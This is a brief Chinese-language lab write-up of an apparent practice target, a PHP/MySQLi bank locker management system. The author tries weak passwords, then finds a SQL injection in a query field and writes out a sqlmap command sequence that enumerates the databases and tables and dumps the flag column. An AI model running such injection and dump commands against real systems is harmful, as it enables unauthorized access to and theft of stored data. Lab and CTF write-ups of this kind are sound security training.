简介
银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。
正文
进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。
找到注入点
发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap
开始抓包
sqlmap开爆
python sqlmap.py -r 2.txt -batch -dbs
python sqlmap.py -r 2.txt -batch -D blmsdb -tables
>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns
拿下靶场
python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump